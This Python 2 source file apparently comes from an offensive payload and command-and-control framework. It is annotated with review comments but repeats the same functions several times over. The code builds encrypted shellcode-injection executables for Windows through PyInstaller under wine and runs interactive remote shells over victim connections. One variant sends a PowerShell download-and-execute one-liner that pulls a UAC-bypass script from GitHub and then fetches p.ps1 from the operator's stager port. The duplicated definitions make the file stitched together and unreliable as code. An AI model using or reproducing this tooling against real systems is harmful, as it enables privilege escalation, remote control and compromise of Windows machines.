def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
    """Render the Windows injection template, build it into an .exe with PyInstaller under wine, then hand it to an upload helper.

    Python 2 code (print statements; raw_input is used by the helpers it calls).

    Args:
        ez2read_shellcode: string substituted into ``SHELLCODE.injectwindows``
            before ``do_Encryption`` transforms the rendered template; also
            forwarded to ``DoClientUpload`` as ``powershellExec``.
        payloadname: basename of the resulting ``.exe`` under ``payloaddir()``.
        shellcode: never referenced in this body.

    Side effects: writes ``payloaddir()/payload.py``, spawns a wine/PyInstaller
    subprocess, moves ``dist/payload.exe`` via a shell command, and calls
    ``CleanUpPayloadMess`` plus one of the two upload helpers.

    Raises:
        KeyboardInterrupt: raised deliberately as an abort signal when the
            substring "error" appears in the build's stderr.
    """
    # do_Encryption, SHELLCODE and payloaddir are defined elsewhere in the
    # project. The explicit close() is redundant inside the with-block.
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'
    # 16 distinct lowercase letters drawn from the non-cryptographic `random`
    # module; handed to PyInstaller as its --key argument.
    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))
    # Argument-list form: no shell is involved in launching the build.
    # NOTE(review): stdout is piped but never drained; a child that fills
    # that pipe can block, and then the poll loop below never finishes.
    p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py', '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    # Spin the progress indicator until the child exits (`is None` would be
    # the idiomatic test; `== None` behaves the same here).
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()
    payloadstderr = p.stderr.read()
    # Failure is detected by a substring match on stderr; the exit status
    # (p.returncode) is never consulted.
    if re.search('error', payloadstderr.lower()):
        print t.bold_red + '[*] Error In Creating Payload... Exiting..\n' + t.normal
        sys.stdout.write(payloadstderr)
        raise KeyboardInterrupt
    # NOTE(review): payloaddir() and payloadname are interpolated into a
    # /bin/sh command line, so shell metacharacters in payloadname would be
    # interpreted by the shell; os.rename would avoid the shell entirely.
    os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    # Function-scope import, presumably to avoid an import cycle with
    # menu — TODO confirm.
    from menu import clientMenuOptions
    # More than two keys is taken to mean at least one live client; the
    # other helpers in this file skip the 'back' and 'r' entries, which
    # suggests those two are always present.
    if len(clientMenuOptions.keys()) > 2:
        DoClientUpload(payloaddir(),payloadname,powershellExec=ez2read_shellcode,isExe=True)
    else:
        DoPayloadUpload(payloadname)
def checkUpload():
    """Ask the operator whether to upload through an existing client and, if so, which one.

    Python 2 code (print statements, list-returning dict.keys()).

    Returns:
        The client's ``params`` entry converted with ``int()`` when a client
        was chosen; ``False`` when the operator answered anything other than
        'y' or an empty line.
    """
    from menu import clientMenuOptions
    use_client_upload = prompt_toolkit.prompt(
        '\n[?] Upload Using Client Connection? [y]/n: ',
        patch_stdout=True,
        completer=WordCompleter(['y', 'n']))
    print
    # An empty answer counts as "yes".
    if use_client_upload.lower() == 'y' or use_client_upload == '':
        clientList = []
        for i in clientMenuOptions.keys():
            # 'back' and 'r' are menu navigation entries, not clients.
            if i == 'back' or i == 'r':
                pass
            else:
                clientList.append(i)
                # Indexing .keys() is Python 2 only. NOTE(review): the [1]
                # index raises IndexError (uncaught here) if a client has
                # fewer than two entries under 'availablemodules'.
                print t.bold_yellow + i + t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload'] + t.bold_yellow + ' | ' + t.bold_green + clientMenuOptions[i]['availablemodules'].keys()[0] + t.bold_yellow + ' | ' + t.bold_green + clientMenuOptions[i]['availablemodules'].keys()[1] + t.normal
        print
        while True:
            clientchoice = prompt_toolkit.prompt(
                'Client > ',
                patch_stdout=True,
                style=prompt_toolkit.styles.style_from_dict({prompt_toolkit.token.Token: '#FFCC66'}),
                completer=WordCompleter(clientList))
            try:
                return int(clientMenuOptions[clientchoice]['params'])
            # NOTE(review): the bare except also swallows KeyboardInterrupt,
            # so Ctrl-C cannot leave this prompt; `except (KeyError,
            # ValueError, TypeError)` would cover the intended cases.
            except:
                continue
    return False
def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
    """Render the Windows injection template, build it with PyInstaller under wine, then upload it via a client or the stand-alone path.

    Python 2 code. Differs from the other variants in this file in that build
    errors are not detected at all: stderr is only echoed when the process
    was started with ``-debug`` as its first argument.

    Args:
        ez2read_shellcode: substituted into ``SHELLCODE.injectwindows`` and
            forwarded to ``clientUpload`` as ``powershellExec``.
        payloadname: basename of the resulting ``.exe`` under ``payloaddir()``.
        shellcode: never referenced in this body.
    """
    # Redundant close() inside the with-block.
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'
    # Key for PyInstaller's --key option, drawn from the non-cryptographic
    # `random` module.
    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))
    # NOTE(review): stdout is piped but never read; a child that fills that
    # pipe blocks and the poll loop below never ends.
    p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py', '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()
    payloadstderr = p.stderr.read()
    # Only the first CLI argument is inspected for the debug switch.
    if len(sys.argv) > 1:
        if sys.argv[1] == "-debug":
            sys.stdout.write(payloadstderr)
    # NOTE(review): no exit-status or stderr check precedes this, so a failed
    # build still prints the success message below (only mv's own error
    # reaches the terminal). payloadname is interpolated into a shell
    # command line; os.rename would avoid the shell.
    os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    from menu import clientMenuOptions
    # More than two keys is treated as "a live client exists" (the 'back'
    # and 'r' entries appear to be permanent).
    if len(clientMenuOptions.keys()) > 2:
        from stager import clientUpload
        # The "%s" inside the json string is presumably filled in by
        # clientUpload — TODO confirm in stager.
        clientUpload((payloaddir() + '/' + payloadname), powershellExec=ez2read_shellcode, isExe=True, json='{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}')
    else:
        DoPayloadUpload(payloadname)
def interactShell(clientconn,clientnumber):
    """Run an interactive command loop over an already-connected client socket.

    Python 2 code (print statements, raw_input, str sockets).

    Args:
        clientconn: connected socket; each command is sent with ``sendall``
            and the reply is read one byte at a time up to a NUL byte.
        clientnumber: key (stringified) of this client in
            ``menu.clientMenuOptions``; removed on "exit".

    Returns:
        True when the loop ends via "back" or "exit".
    """
    from menu import clientMenuOptions
    print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24
    while True:
        command = raw_input("PS > ")
        # "back" leaves the loop without touching the connection.
        if command == "back":
            break
        elif command == "" or command == "\n":
            continue
        elif command == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
            clientconn.close()
            break
        else:
            clientconn.sendall(command)
            # Reply is framed by a trailing "\x00".
            # NOTE(review): recv(1) returns "" once the peer closes, which
            # never equals "\x00", so a dropped connection spins here
            # forever; an empty read should end the loop.
            while True:
                data = clientconn.recv(1)
                sys.stdout.write(data)
                sys.stdout.flush()
                if data == "\x00":
                    # This assignment is dead: data is rebound on the next
                    # recv() and not read in between.
                    data = ''
                    break
    return True
def interactShell(clientconn,clientnumber):
    """Run an interactive command loop over a connected client socket, draining and echoing any unsolicited data first.

    Python 2 code (print statements, raw_input, str sockets).

    Args:
        clientconn: connected socket.
        clientnumber: key (stringified) of this client in
            ``menu.clientMenuOptions``; removed on "exit".

    Returns:
        The string "clear" — presumably a signal to the caller to redraw
        the screen; TODO confirm against the caller.
    """
    computerName = ""
    from menu import clientMenuOptions
    print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24
    while True:
        # Drain whatever the client has already sent (200 ms select timeout).
        # NOTE(review): computerName is never reset, so everything drained so
        # far is re-printed on every iteration; and a closed socket is always
        # readable with recv() returning "", which makes this inner loop
        # spin forever.
        while clientconn in select.select([clientconn], [], [], 0.2)[0]:
            computerName += clientconn.recv(2048)
        if len(computerName) > 1:
            print t.bold_yellow + computerName + t.normal
        command = raw_input("> ")
        if command == "back":
            break
        elif command == "":
            # An empty line is forwarded as a bare newline and no reply is
            # awaited here (it is picked up by the drain above).
            clientconn.sendall("\n")
        elif command == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
            clientconn.close()
            time.sleep(2)
            break
        else:
            clientconn.sendall(command)
            # Reply is framed by a trailing "\x00"; single "\r" bytes are
            # dropped by the rstrip. NOTE(review): recv(1) returns "" after
            # the peer closes, which never matches "\x00", so a dropped
            # connection spins here.
            while True:
                data = clientconn.recv(1).rstrip('\r')
                sys.stdout.write(data)
                sys.stdout.flush()
                if data == "\x00":
                    break
    return "clear"
def interactShell(clientconn, clientnumber):
    """Run an interactive command loop over a connected client socket, draining and echoing any unsolicited data first.

    Python 2 code (print statements, raw_input, str sockets). Same logic as
    the unspaced-signature variant in this file; only formatting differs.

    Args:
        clientconn: connected socket.
        clientnumber: key (stringified) of this client in
            ``menu.clientMenuOptions``; removed on "exit".

    Returns:
        The string "clear" — presumably a redraw signal for the caller;
        TODO confirm.
    """
    computerName = ""
    from menu import clientMenuOptions
    print "Commands\n" + "-" * 24 + "\nback - Background Shell\nexit - Close Connection\n" + "-" * 24
    while True:
        # Drain pending data (200 ms select timeout).
        # NOTE(review): computerName accumulates across iterations and is
        # never cleared, so earlier output is re-printed each time; a closed
        # socket is always readable with recv() == "", so this can spin.
        while clientconn in select.select([clientconn], [], [], 0.2)[0]:
            computerName += clientconn.recv(2048)
        if len(computerName) > 1:
            print t.bold_yellow + computerName + t.normal
        command = raw_input("> ")
        if command == "back":
            break
        elif command == "":
            clientconn.sendall("\n")
        elif command == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
            clientconn.close()
            time.sleep(2)
            break
        else:
            clientconn.sendall(command)
            # Byte-at-a-time read until the "\x00" frame terminator; "\r"
            # bytes are dropped. NOTE(review): an empty recv() (peer closed)
            # never matches the terminator, so the loop does not end.
            while True:
                data = clientconn.recv(1).rstrip('\r')
                sys.stdout.write(data)
                sys.stdout.flush()
                if data == "\x00":
                    break
    return "clear"
def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
    """Render the Windows injection template, build it with PyInstaller under wine, then hand it to an upload helper.

    Python 2 code. Same flow as the ``os.path.expanduser('~')`` variant in
    this file, but the wine Python interpreter path is hard-coded under
    ``/root``, so it only works when run as that user.

    Args:
        ez2read_shellcode: substituted into ``SHELLCODE.injectwindows`` and
            forwarded to ``DoClientUpload`` as ``powershellExec``.
        payloadname: basename of the resulting ``.exe`` under ``payloaddir()``.
        shellcode: never referenced in this body.

    Raises:
        KeyboardInterrupt: used as an abort signal when "error" appears in
            the build's stderr.
    """
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'
    # Key for PyInstaller's --key option; `random` is not a CSPRNG.
    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))
    # NOTE(review): stdout is piped but never drained; a child that fills
    # the pipe blocks and the poll loop below never finishes.
    p = subprocess.Popen(['wine', '/root/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py', '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()
    payloadstderr = p.stderr.read()
    # Substring match on stderr stands in for an exit-status check.
    if re.search('error', payloadstderr.lower()):
        print t.bold_red + '[*] Error In Creating Payload... Exiting..\n' + t.normal
        sys.stdout.write(payloadstderr)
        raise KeyboardInterrupt
    # NOTE(review): payloadname goes through /bin/sh here; os.rename would
    # avoid the shell.
    os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    from menu import clientMenuOptions
    # More than two keys is treated as "a live client exists".
    if len(clientMenuOptions.keys()) > 2:
        DoClientUpload(payloaddir(),payloadname,powershellExec=ez2read_shellcode,isExe=True)
    else:
        DoPayloadUpload(payloadname)
def checkClientUpload(payloadname, powershellExec, isExe):
    """Route an upload through a connected client when one exists.

    Python 2 code. Delegates to ``DoClientUpload`` when the client menu holds
    more than its two navigation entries; otherwise prints ``powershellExec``
    to the console instead.

    Returns:
        True after delegating to ``DoClientUpload``, False after the
        print-only fallback.
    """
    from menu import clientMenuOptions
    # Presumably 'back' and 'r' are always present in the menu (the other
    # helpers in this file skip them), so a third key means a live client —
    # TODO confirm against menu.
    no_live_client = len(clientMenuOptions.keys()) <= 2
    if no_live_client:
        print powershellExec
        return False
    DoClientUpload(payloaddir(), payloadname, powershellExec, isExe)
    return True
def GeneratePayload(ez2read_shellcode, payloadname, shellcode):
    """Render the Windows injection template under a random file name, build it with PyInstaller in a 32-bit wine prefix, then upload it.

    Python 2 code. Unlike the other variants in this file, the output name is
    a random 8-letter stem (``payloadname`` is never used), the rename is done
    with ``os.rename`` instead of a shell command, and failure is detected by
    that rename raising ``OSError``.

    Args:
        ez2read_shellcode: substituted into ``SHELLCODE.injectwindows`` and
            forwarded to ``clientUpload`` as ``powershellExec``.
        payloadname: never referenced in this body.
        shellcode: never referenced in this body.

    Returns:
        True on success, False when ``dist/<stem>.exe`` could not be renamed.
    """
    # 8 distinct lowercase letters from the non-cryptographic `random` module.
    randoFileName = ''.join(random.sample(string.ascii_lowercase, 8))
    with open('%s/%s.py' % (payloaddir(), randoFileName), 'w+') as Filesave:
        Filesave.write(
            do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'
    # A dedicated 32-bit wine prefix is selected through the environment.
    # NOTE(review): stdout is piped but never read; a child that fills that
    # pipe blocks and the poll loop below never finishes.
    p = subprocess.Popen([
        'wine',
        os.path.expanduser('~') + '/.win32/drive_c/Python27/python.exe',
        '/opt/pyinstaller/pyinstaller.py',
        '%s/%s.py' % (payloaddir(), randoFileName), '--noconsole', '--onefile'
    ],
                         env=dict(
                             os.environ, **{
                                 'WINEARCH': 'win32',
                                 'WINEPREFIX': os.path.expanduser('~') + '/.win32'
                             }),
                         bufsize=1024,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()
    payloadstderr = p.stderr.read()
    # Build output is only shown when the process was started with -debug
    # as its first CLI argument.
    if len(sys.argv) > 1:
        if sys.argv[1] == "-debug":
            sys.stdout.write(payloadstderr)
    # A missing dist/<stem>.exe is the only failure signal; the exit status
    # is never consulted.
    try:
        os.rename('dist/%s.exe' % randoFileName,
                  '%s/%s.exe' % (payloaddir(), randoFileName))
    except OSError:
        print t.bold_red + "[!] Error while creating payload..." + t.normal
        print payloadstderr
        return False
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (
        payloaddir(), randoFileName) + t.normal
    CleanUpPayloadMess(randoFileName)
    from menu import clientMenuOptions
    # More than two keys is treated as "a live client exists".
    if len(clientMenuOptions.keys()) > 2:
        from stager import clientUpload
        # The "%s" in the json string is presumably filled in by
        # clientUpload — TODO confirm in stager.
        clientUpload(
            (payloaddir() + '/' + randoFileName),
            powershellExec=ez2read_shellcode,
            isExe=True,
            json=
            '{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}'
        )
    else:
        DoPayloadUpload(randoFileName)
    return True
def pingClients(clientconn,clientnumber):
    """Poll a client socket every 15 s and drop the client from the menu when a read raises.

    Python 2 code. Presumably runs on its own thread per client (the
    ``sys.exit(1)`` at the end raises SystemExit in whichever thread calls
    this) — TODO confirm at the call site.

    Args:
        clientconn: connected socket to probe with ``recv(1)``.
        clientnumber: key (stringified) of this client in
            ``menu.clientMenuOptions``.
    """
    from menu import clientMenuOptions
    try:
        # NOTE(review): each recv(1) consumes one real byte of the stream, so
        # data the client sends between commands can be swallowed here rather
        # than by the interactive reader. A graceful close makes recv()
        # return "" without raising, so only an error — not a clean
        # disconnect — ends this loop.
        while True:
            time.sleep(15)
            clientconn.recv(1)
    # Bare except: any exception, including KeyboardInterrupt and
    # SystemExit, is treated as "client gone".
    except:
        if str(clientnumber) in clientMenuOptions.keys():
            print t.bold_red + "Client %s Has Disconnected" % clientnumber + t.normal
            del clientMenuOptions[str(clientnumber)]
        sys.exit(1)
def checkUpload():
    """Ask the operator whether to upload through an existing client and, if so, which one.

    Python 2 code (print statements, raw_input).

    Returns:
        The chosen client's ``params`` entry converted with ``int()``, or
        ``False`` when the operator declined (anything other than 'y' or an
        empty line).
    """
    from menu import clientMenuOptions
    use_client_upload = raw_input('[?] Upload Using Client Connection? [y]/n: ')
    # An empty answer counts as "yes".
    if use_client_upload.lower() == 'y' or use_client_upload == '':
        for i in clientMenuOptions.keys():
            # 'back' and 'r' are menu navigation entries, not clients.
            if i == 'back' or i == 'r':
                pass
            else:
                print t.bold_yellow + i + t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload'] + t.normal + '\n'
        while True:
            clientchoice = raw_input('>> ')
            try:
                return int(clientMenuOptions[clientchoice]['params'])
            # NOTE(review): the bare except also catches KeyboardInterrupt,
            # so Ctrl-C cannot leave this prompt; `except (KeyError,
            # ValueError, TypeError)` is what the retry is meant to cover.
            except:
                continue
    return False
def DoClientUpload(payloaddir,payloadname,powershellExec,isExe):
    """Prompt for a client to upload through and call ``clientUpload`` with that client's number.

    Python 2 code (print statements, raw_input).

    Args:
        payloaddir: directory string. NOTE(review): this parameter shadows
            the module-level ``payloaddir()`` function that callers pass in
            as ``payloaddir()``; the name is easy to misread.
        payloadname: file name joined onto ``payloaddir`` with '/'.
        powershellExec, isExe: forwarded unchanged to ``clientUpload``.

    Nothing happens when the operator answers anything other than 'y' or
    an empty line.
    """
    use_client_upload = raw_input(
        '\n[*] Upload Using Client Connection? [y]/n: ')
    if use_client_upload.lower() == 'y' or use_client_upload == '':
        from menu import clientMenuOptions
        for i in clientMenuOptions.keys():
            # 'back' and 'r' are navigation entries, not clients.
            if i == 'back' or i == 'r':
                pass
            else:
                print t.bold_yellow + i +t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload'] + t.normal + '\n'
        # Re-prompt until the input is a known client key.
        # NOTE(review): the bare except also swallows KeyboardInterrupt, so
        # Ctrl-C cannot leave this loop; `except KeyError` is the intent.
        while True:
            clientchoice = raw_input('>> ')
            try:
                clientnumber = clientMenuOptions[clientchoice]['params']
                break
            except:
                continue
        clientUpload((payloaddir + '/' + payloadname),clientnumber,powershellExec,isExe)
        print "Allow 20 seconds for payload connection..."
def DoClientUpload(payloaddir,payloadname,powershellExec,isExe):
    """Prompt for a client to upload through and call ``clientUpload`` with that client's socket.

    Python 2 code (print statements, raw_input). In this variant the menu's
    ``params`` entry is a (connection, number) pair and the connection object
    is what gets passed on.

    Args:
        payloaddir: directory string. NOTE(review): shadows the module-level
            ``payloaddir()`` function that callers pass in as ``payloaddir()``.
        payloadname: file name joined onto ``payloaddir`` with '/'.
        powershellExec, isExe: forwarded unchanged to ``clientUpload``.

    Nothing happens when the operator answers anything other than 'y' or
    an empty line.
    """
    use_client_upload = raw_input(
        '\n[*] Upload Using Client Connection? [y]/n: ')
    if use_client_upload.lower() == 'y' or use_client_upload == '':
        from menu import clientMenuOptions
        for i in clientMenuOptions.keys():
            # 'back' and 'r' are navigation entries, not clients.
            if i == 'back' or i == 'r':
                pass
            else:
                print t.bold_yellow + i +t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload'] + t.normal + '\n'
        # Re-prompt until the input is a known client whose params unpack
        # into two values. NOTE(review): the bare except hides the
        # difference between an unknown key and a malformed params tuple,
        # and also swallows KeyboardInterrupt.
        while True:
            clientchoice = raw_input('>> ')
            try:
                clientconn, clientnumber = clientMenuOptions[clientchoice]['params']
                break
            except:
                continue
        clientUpload((payloaddir + '/' + payloadname),clientconn,powershellExec,isExe)
def interactShell(clientconn, clientnumber):
    """Run an interactive command loop over a connected client socket, with a built-in "uacbypass" command.

    Python 2 code (print statements, raw_input, str sockets).

    Args:
        clientconn: connected socket.
        clientnumber: key (stringified) of this client in
            ``menu.clientMenuOptions``; removed on "exit".

    Returns:
        The string "clear" — presumably a redraw signal for the caller;
        TODO confirm.
    """
    computerName = ""
    from menu import clientMenuOptions
    print "Commands\n" + "-" * 50 + "\nback - Background Shell\nexit - Close Connection\nuacbypass - UacBypass To Open New Admin Connection\n" + "-" * 50
    while True:
        # Drain pending data (100 ms select timeout).
        # NOTE(review): computerName is never reset, so earlier output is
        # re-printed on every iteration; a closed socket is always readable
        # with recv() == "", so this inner loop can spin forever.
        while clientconn in select.select([clientconn], [], [], 0.1)[0]:
            computerName += clientconn.recv(2048)
        if len(computerName) > 1:
            print t.bold_yellow + computerName + t.normal
        command = raw_input(" ")
        if command.lower() == "back":
            break
        elif command.lower() == "uacbypass":
            # Sends a fixed PowerShell one-liner that fetches a script from a
            # public URL and calls back to this host's stager port (FUNCTIONS
            # and randoStagerDLPort come from module scope). No reply is read
            # here; any output is picked up by the drain above. Both the
            # outbound fetch and the callback are visible on the wire.
            clientconn.sendall(
                "IEX (New-Object Net.WebClient).DownloadString(\"https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-EventVwrBypass.ps1\");Invoke-EventVwrBypass -Command \"powershell.exe -c IEX (New-Object Net.Webclient).DownloadString('http://" + FUNCTIONS().CheckInternet() + ":" + str(randoStagerDLPort) + "/" + "p.ps1" + "')\"")
        elif command == "":
            clientconn.sendall("\n")
        elif command.lower() == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client %s Connection Killed" % clientnumber + t.normal
                del clientMenuOptions[str(clientnumber)]
            clientconn.close()
            time.sleep(2)
            break
        else:
            clientconn.sendall(command)
            # Byte-at-a-time read until the "\x00" frame terminator; "\r"
            # bytes are dropped. NOTE(review): an empty recv() (peer closed)
            # never matches the terminator, so the loop does not end.
            while True:
                data = clientconn.recv(1).rstrip('\r')
                sys.stdout.write(data)
                sys.stdout.flush()
                if data == "\x00":
                    break
    return "clear"
def interactShell(clientconn,clientnumber):
    """Run an interactive command loop over an already-connected client socket.

    Python 2 code (print statements, raw_input, str sockets). Same contract
    as the other "PS >" variant in this file, written with a flat chain of
    ``if`` statements instead of ``elif``.

    Args:
        clientconn: connected socket; each command is sent with ``sendall``
            and the reply read one byte at a time up to a NUL byte.
        clientnumber: key (stringified) of this client in
            ``menu.clientMenuOptions``; removed on "exit".

    Returns:
        True when the loop ends via "back" or "exit".
    """
    from menu import clientMenuOptions
    print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24
    while True:
        # Reset per iteration; only meaningful inside the reply loop below.
        data = ''
        command = raw_input("PS >")
        if command == "back":
            break
        if command == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
            clientconn.close()
            break
        if command == "":
            continue
        clientconn.sendall(command)
        # Reply is framed by a trailing "\x00". NOTE(review): recv(1)
        # returns "" once the peer closes, which never equals "\x00", so a
        # dropped connection spins here; an empty read should end the loop.
        while True:
            data = clientconn.recv(1)
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                break
    return True
def checkClientUpload(payloadname, powershellExec, isExe):
    """Route an upload through a connected client when one exists.

    Python 2 code. Delegates to ``DoClientUpload`` when the client menu holds
    more than its two navigation entries; otherwise prints ``powershellExec``
    to the console instead. Returns None either way.
    """
    from menu import clientMenuOptions
    # Presumably 'back' and 'r' are always present in the menu (the other
    # helpers in this file skip them), so a third key means a live client —
    # TODO confirm against menu.
    no_live_client = len(clientMenuOptions.keys()) <= 2
    if no_live_client:
        print powershellExec
        return
    DoClientUpload(payloaddir(), payloadname, powershellExec, isExe)